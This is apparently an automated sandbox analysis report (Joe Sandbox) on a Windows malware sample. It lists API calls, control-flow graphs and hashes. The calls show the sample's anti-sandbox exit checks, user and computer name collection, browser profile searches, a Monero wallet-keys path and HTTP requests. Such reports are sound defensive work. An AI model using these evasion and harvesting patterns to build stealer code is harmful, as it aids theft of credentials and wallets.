                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\
                          • API String ID: 1544550907-3809124531
                          • Opcode ID: 3018ce2cd4ca5322ccbf3ff68b12bc74f81a0559a71981446d43becb3e73435a
                          • Instruction ID: eba0c3a8648784348824fb327984fee648b1b6ed7b14491dd2273f145fe24761
                          • Opcode Fuzzy Hash: 3018ce2cd4ca5322ccbf3ff68b12bc74f81a0559a71981446d43becb3e73435a
                          • Instruction Fuzzy Hash: 924162B1904248ABDF10DBD4DD45BEEB7B4EF18704F100199F609A7280D7796A45CBA5

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790650), ref: 00AF98A1
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790668), ref: 00AF98BA
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790680), ref: 00AF98D2
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790758), ref: 00AF98EA
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790530), ref: 00AF9903
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01798B48), ref: 00AF991B
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01785548), ref: 00AF9933
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,017854A8), ref: 00AF994C
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,017906E0), ref: 00AF9964
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790710), ref: 00AF997C
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790548), ref: 00AF9995
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790740), ref: 00AF99AD
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01785288), ref: 00AF99C5
                            • Part of subcall function 00AF9860: GetProcAddress.KERNEL32(75550000,01790770), ref: 00AF99DE
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AE11D0: ExitProcess.KERNEL32 ref: 00AE1211
                            • Part of subcall function 00AE1160: GetSystemInfo.KERNEL32(?), ref: 00AE116A
                            • Part of subcall function 00AE1160: ExitProcess.KERNEL32 ref: 00AE117E
                            • Part of subcall function 00AE1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00AE112B
                            • Part of subcall function 00AE1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00AE1132
                            • Part of subcall function 00AE1110: ExitProcess.KERNEL32 ref: 00AE1143
                            • Part of subcall function 00AE1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00AE123E
                            • Part of subcall function 00AE1220: __aulldiv.LIBCMT ref: 00AE1258
                            • Part of subcall function 00AE1220: __aulldiv.LIBCMT ref: 00AE1266
                            • Part of subcall function 00AE1220: ExitProcess.KERNEL32 ref: 00AE1294
                            • Part of subcall function 00AF6770: GetUserDefaultLangID.KERNEL32 ref: 00AF6774
                            • Part of subcall function 00AE1190: ExitProcess.KERNEL32 ref: 00AE11C6
                            • Part of subcall function 00AF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AE11B7), ref: 00AF7880
                            • Part of subcall function 00AF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00AF7887
                            • Part of subcall function 00AF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AF789F
                            • Part of subcall function 00AF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF7910
                            • Part of subcall function 00AF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00AF7917
                            • Part of subcall function 00AF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00AF792F
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01798B58,?,00B0110C,?,00000000,?,00B01110,?,00000000,00B00AEF), ref: 00AF6ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AF6AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00AF6AF9
                          • Sleep.KERNEL32(00001770), ref: 00AF6B04
                          • CloseHandle.KERNEL32(?,00000000,?,01798B58,?,00B0110C,?,00000000,?,00B01110,?,00000000,00B00AEF), ref: 00AF6B1A
                          • ExitProcess.KERNEL32 ref: 00AF6B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: bc9f5432f11e0155d1916778daa8522b8afef4b7aa53ec9dec306e30f12c4a93
                          • Instruction ID: a270a22c5c033ab21b62eb34a24105cb444edb8abab90e8936400154d3987786
                          • Opcode Fuzzy Hash: bc9f5432f11e0155d1916778daa8522b8afef4b7aa53ec9dec306e30f12c4a93
                          • Instruction Fuzzy Hash: 2831DE7190020CABDB14F7E0DE56BFE7778AF24380F504528F316A6191DFB05A05C6A6

                          Control-flow Graph (basic blocks with their API calls; successors listed after "->")

                          • ae1220-ae1247: call af89b0, GlobalMemoryStatusEx -> ae1249-ae1271, ae1273-ae127a
                          • ae1249-ae1271: call afda00 * 2 -> ae1281-ae1285
                          • ae1273-ae127a -> ae1281-ae1285
                          • ae1281-ae1285 -> ae129a-ae129d, ae1287
                          • ae1287 -> ae1289-ae1290, ae1292-ae1294
                          • ae1289-ae1290 -> ae129a-ae129d, ae1292-ae1294
                          • ae1292-ae1294: ExitProcess
                          • ae129a-ae129d
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00AE123E
                          • __aulldiv.LIBCMT ref: 00AE1258
                          • __aulldiv.LIBCMT ref: 00AE1266
                          • ExitProcess.KERNEL32 ref: 00AE1294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: f0b3ab391a39e034aa06d22ffd0ba60acb83be4d3d7db484a9298bc6bd4cc479
                          • Instruction ID: fcd204aaf4315868fea6ddcac4cfe631394bd0055bf792b73c419cc100642c52
                          • Opcode Fuzzy Hash: f0b3ab391a39e034aa06d22ffd0ba60acb83be4d3d7db484a9298bc6bd4cc479
                          • Instruction Fuzzy Hash: 0901FBB0944358ABEB10EBE5CD49BAEBB78EB14705F208058F705B6280D6B456458B99

                          Control-flow Graph (basic blocks with their API calls; successors listed after "->")

                          • af6af3 -> af6b0a
                          • af6b0a -> af6b0c-af6b22, af6aba-af6ad7
                          • af6aba-af6ad7: call afaad0, OpenEventA -> af6ad9-af6af1, af6af5-af6b04
                          • af6ad9-af6af1: call afaad0, CreateEventA -> af6b0c-af6b22
                          • af6af5-af6b04: CloseHandle, Sleep -> af6b0a (loop)
                          • af6b0c-af6b22: call af6920, call af5b10, CloseHandle, ExitProcess
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01798B58,?,00B0110C,?,00000000,?,00B01110,?,00000000,00B00AEF), ref: 00AF6ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AF6AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00AF6AF9
                          • Sleep.KERNEL32(00001770), ref: 00AF6B04
                          • CloseHandle.KERNEL32(?,00000000,?,01798B58,?,00B0110C,?,00000000,?,00B01110,?,00000000,00B00AEF), ref: 00AF6B1A
                          • ExitProcess.KERNEL32 ref: 00AF6B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: dbcb06cac736c46f7be1e244ba6c8372d5f33fcf71cc9f5c1142cf8ad5e154ce
                          • Instruction ID: 5e38d39a033d06cf85c0b24885121959d1aa81ee2e1d38ccfdccaf0dcb0e1f37
                          • Opcode Fuzzy Hash: dbcb06cac736c46f7be1e244ba6c8372d5f33fcf71cc9f5c1142cf8ad5e154ce
                          • Instruction Fuzzy Hash: A9F0D470A8031DABE720BBE09D0ABBE7B74EB24741F108514B716E6291DBB05541DAA6

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AE4839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00AE4849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: c946df95796035665ee13a1eeed35802b446da10218b03d9de376622c40f7d58
                          • Instruction ID: e0d5079b0fc4cf6edae7de62eaeeefe905345577166ce026597e1f17a6d055eb
                          • Opcode Fuzzy Hash: c946df95796035665ee13a1eeed35802b446da10218b03d9de376622c40f7d58
                          • Instruction Fuzzy Hash: 7D211FB1D00209ABDF14DFA4E945ADD7B74FB55320F108629FA19A72D0DB706A05CF91

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE6280: InternetOpenA.WININET(00B00DFE,00000001,00000000,00000000,00000000), ref: 00AE62E1
                            • Part of subcall function 00AE6280: StrCmpCA.SHLWAPI(?,0179E258), ref: 00AE6303
                            • Part of subcall function 00AE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AE6335
                            • Part of subcall function 00AE6280: HttpOpenRequestA.WININET(00000000,GET,?,0179DDB0,00000000,00000000,00400100,00000000), ref: 00AE6385
                            • Part of subcall function 00AE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AE63BF
                            • Part of subcall function 00AE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AE63D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AF5228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 8e74de5b99548c3253e3fecac0ab0d07093606859e3c4f2b2fd9cc0cb7978aa0
                          • Instruction ID: 3e0e03e65f39dfcfb59edc6f756cbaaa434883bd68d1e148b1f0a50c3cfe624b
                          • Opcode Fuzzy Hash: 8e74de5b99548c3253e3fecac0ab0d07093606859e3c4f2b2fd9cc0cb7978aa0
                          • Instruction Fuzzy Hash: 04110D7090014CA6CB14FFA4DE52AFD7778AF60340F408554FA0A4A192EF706B06C691
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00AE112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00AE1132
                          • ExitProcess.KERNEL32 ref: 00AE1143
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: cc49a04a81a1a1496db2cabcfec179597f52fbcff9ff92489458b1d9ea3a3318
                          • Instruction ID: 50b6df24dc8f336882b3f3d655905bbcdf63edd086c9cdaff17b0e50c397ee0e
                          • Opcode Fuzzy Hash: cc49a04a81a1a1496db2cabcfec179597f52fbcff9ff92489458b1d9ea3a3318
                          • Instruction Fuzzy Hash: 68E0E670A45348FBE7206BA59D0AB0D7678EB14B01F104154F709F62D0D6B5264196A9
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00AE10B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00AE10F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 3631df32d3fe88c9bdbec9e40e9a81b9b712d640c2799eb902db710b68bb9513
                          • Instruction ID: 60e6732b4cd23b30cf776a6d56ce55a05b3887b04cb8e7cb31fcccda69a28352
                          • Opcode Fuzzy Hash: 3631df32d3fe88c9bdbec9e40e9a81b9b712d640c2799eb902db710b68bb9513
                          • Instruction Fuzzy Hash: 43F0E271641318BBEB149BA8AC49FBAB7E8E705B15F300448F604E3280D5719E00CAA4
                          APIs
                            • Part of subcall function 00AF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF7910
                            • Part of subcall function 00AF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00AF7917
                            • Part of subcall function 00AF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00AF792F
                            • Part of subcall function 00AF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AE11B7), ref: 00AF7880
                            • Part of subcall function 00AF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00AF7887
                            • Part of subcall function 00AF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AF789F
                          • ExitProcess.KERNEL32 ref: 00AE11C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: d53970d05b86826dfe00933f10bc6e38328b4cd2dab12a5d15c9c8bf5e41b364
                          • Instruction ID: 002c6c99473bc2cf0384dd922cb6d5518507fa885e11319fb10d2af34e8612f0
                          • Opcode Fuzzy Hash: d53970d05b86826dfe00933f10bc6e38328b4cd2dab12a5d15c9c8bf5e41b364
                          • Instruction Fuzzy Hash: C6E012B591430953CE1477F5AD0AB3A339CDB24386F480528FB05D3302FA29E85285BA
                          APIs
                          • wsprintfA.USER32 ref: 00AF38CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 00AF38E3
                          • lstrcat.KERNEL32(?,?), ref: 00AF3935
                          • StrCmpCA.SHLWAPI(?,00B00F70), ref: 00AF3947
                          • StrCmpCA.SHLWAPI(?,00B00F74), ref: 00AF395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AF3C67
                          • FindClose.KERNEL32(000000FF), ref: 00AF3C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 73e071ad08675608ba78e94f8e49f7a0f0cc847876f4eb484ee312e399f3bc4f
                          • Instruction ID: 1fc83249392c36ab6c35eddbb3d5109a77fb606d5c542955d502b8a4ab35477e
                          • Opcode Fuzzy Hash: 73e071ad08675608ba78e94f8e49f7a0f0cc847876f4eb484ee312e399f3bc4f
                          • Instruction Fuzzy Hash: B0A12CB2A003189BDB34EBA4DC85FFA7378FB58301F044588B60D96181EB759B85CF62
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00B00B32,00B00B2B,00000000,?,?,?,00B013F4,00B00B2A), ref: 00AEBEF5
                          • StrCmpCA.SHLWAPI(?,00B013F8), ref: 00AEBF4D
                          • StrCmpCA.SHLWAPI(?,00B013FC), ref: 00AEBF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AEC7BF
                          • FindClose.KERNEL32(000000FF), ref: 00AEC7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: 75217b58bf893c73c5cde892b9389f073fb9a35359ecf60c8a7475c8f53a072d
                          • Instruction ID: 084073a77603329f9fc82d561a7859a9b7853c9f911dc5d62bdd7b87549d8880
                          • Opcode Fuzzy Hash: 75217b58bf893c73c5cde892b9389f073fb9a35359ecf60c8a7475c8f53a072d
                          • Instruction Fuzzy Hash: 284258B291010897CB14FBB4DE96EFD737DAF64300F408558B60E96191EF74AB49CBA2
                          APIs
                          • wsprintfA.USER32 ref: 00AF492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00AF4943
                          • StrCmpCA.SHLWAPI(?,00B00FDC), ref: 00AF4971
                          • StrCmpCA.SHLWAPI(?,00B00FE0), ref: 00AF4987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AF4B7D
                          • FindClose.KERNEL32(000000FF), ref: 00AF4B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: ca4d6c03379eff5422523744f3d97c20c269634355ff332a10f63861fc211183
                          • Instruction ID: c24d1a2a2ef5be7f99810eea28d05ce12ba92fa63cea4d20c8e4a06f56420b24
                          • Opcode Fuzzy Hash: ca4d6c03379eff5422523744f3d97c20c269634355ff332a10f63861fc211183
                          • Instruction Fuzzy Hash: 6C6153B1910219ABCB30EBA4DC85FFA77BCFB58701F004588B609D6141EB71AB45CFA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00AF4580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF4587
                          • wsprintfA.USER32 ref: 00AF45A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 00AF45BD
                          • StrCmpCA.SHLWAPI(?,00B00FC4), ref: 00AF45EB
                          • StrCmpCA.SHLWAPI(?,00B00FC8), ref: 00AF4601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AF468B
                          • FindClose.KERNEL32(000000FF), ref: 00AF46A0
                          • lstrcat.KERNEL32(?,0179E328), ref: 00AF46C5
                          • lstrcat.KERNEL32(?,0179D700), ref: 00AF46D8
                          • lstrlen.KERNEL32(?), ref: 00AF46E5
                          • lstrlen.KERNEL32(?), ref: 00AF46F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 2665b4b5cbb094481c627daf26f85c7e2f0950885ba0eb5131c8f56f3e092bb0
                          • Instruction ID: 868c3fbac098dfed3100d3ba315a5c04ea036c06ebcef1c2c742356e94e4f71e
                          • Opcode Fuzzy Hash: 2665b4b5cbb094481c627daf26f85c7e2f0950885ba0eb5131c8f56f3e092bb0
                          • Instruction Fuzzy Hash: EB5133B15103189BCB24EBB4DD89FFE777CEB68300F404598B609D6190EB749B858FA1
                          APIs
